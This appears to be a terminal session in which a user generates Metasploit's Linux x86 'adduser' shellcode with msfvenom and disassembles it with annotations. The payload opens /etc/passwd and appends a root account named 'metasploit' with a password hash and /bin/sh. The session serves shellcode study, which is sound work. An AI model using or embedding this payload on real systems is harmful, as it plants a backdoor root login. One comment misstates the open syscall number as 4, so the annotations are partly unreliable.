root@nitrogen:~# msfvenom -p linux/x86/adduser -f raw | ndisasm -u -
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 97 bytes

00000000  31C9              xor ecx,ecx		;ecx=0
00000002  89CB              mov ebx,ecx		;ebx=0
00000004  6A46              push byte +0x46	;70
00000006  58                pop eax		;eax=70 => syscal setreuid
00000007  CD80              int 0x80		;fire syscall

00000009  6A05              push byte +0x5	;5
0000000B  58                pop eax		;eax=4 => syscall open
0000000C  31C9              xor ecx,ecx		;ecx=0
0000000E  51                push ecx		;0 = string terminator
0000000F  6873737764        push dword 0x64777373	;dwss
00000014  682F2F7061        push dword 0x61702f2f	;ap//
00000019  682F657463        push dword 0x6374652f	;cte/  => "/etc//passwd" on stack	
0000001E  89E3              mov ebx,esp		;Pointer to "/etc//passwd" is first parameter of open
00000020  41                inc ecx		;ecx=1
00000021  B504              mov ch,0x4		;ecx=1025 (flags)
00000023  CD80              int 0x80		;fire syscall => open file

00000025  93                xchg eax,ebx	;ebx= file descriptor for /etc/passwd
00000026  E828000000        call 0x53	
	
6D65746173706C6F69743A417A2F6449736A3470344952633A303A303A3A2F3A2F62696E2F73680A
; "metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh"

0000002B  skipping 0x28 bytes
;----
00000053  59                pop ecx		;ecx= pointer to string
00000054  8B51FC            mov edx,[ecx-0x4]	;edx=0x28=length of string
;----
00000057  6A04              push byte +0x4	;4
00000059  58                pop eax		;eax=4 => syscall write
0000005A  CD80              int 0x80		;fire syscall => write to file

0000005C  6A01              push byte +0x1	;1
0000005E  58                pop eax		;eax=1 => syscall exit
0000005F  CD80              int 0x80		;fire syscall => exit programm
root@nitrogen:~# 

